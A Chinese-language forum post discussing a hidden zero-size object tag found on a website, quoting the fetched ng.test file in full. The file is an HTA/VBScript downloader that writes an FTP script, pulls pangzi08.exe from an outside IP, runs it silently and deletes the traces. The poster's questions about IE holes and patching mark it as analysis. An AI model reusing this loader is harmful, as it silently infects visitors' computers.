|
Golden Member
|
引用:
|
作者darksnow
首頁原始碼最下面有一行這個
<object data="http://zhu.7xi.org/pangzi08/ng.test" weight=0 width=0></object>
|
ng.test的內容
代碼:
<HTA:APPLICATION caption="no" border="none" showInTaskBar="yes" windowState="minimize">
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script language="VBScript">
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject")
Set t = fs.CreateTextFile("163.txt",True)
t.WriteLine("open 61.163.238.51")
t.WriteLine("new")
t.WriteLine("new")
t.WriteLine("lcd c:\")
t.WriteLine("bin")
t.WriteLine("get pangzi08.exe")
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:163.txt",0,true
wsh.Run "c:\pangzi08.exe"
fs.DeleteFile "163.txt",true
window.close
window.close
</script>
我猜會不會是利用某版IE的hole來搞的?
有跑windowsupdate更新到最新的就不會有事,也不會下載那個執行檔,所以防毒軟體就不會偵測到? |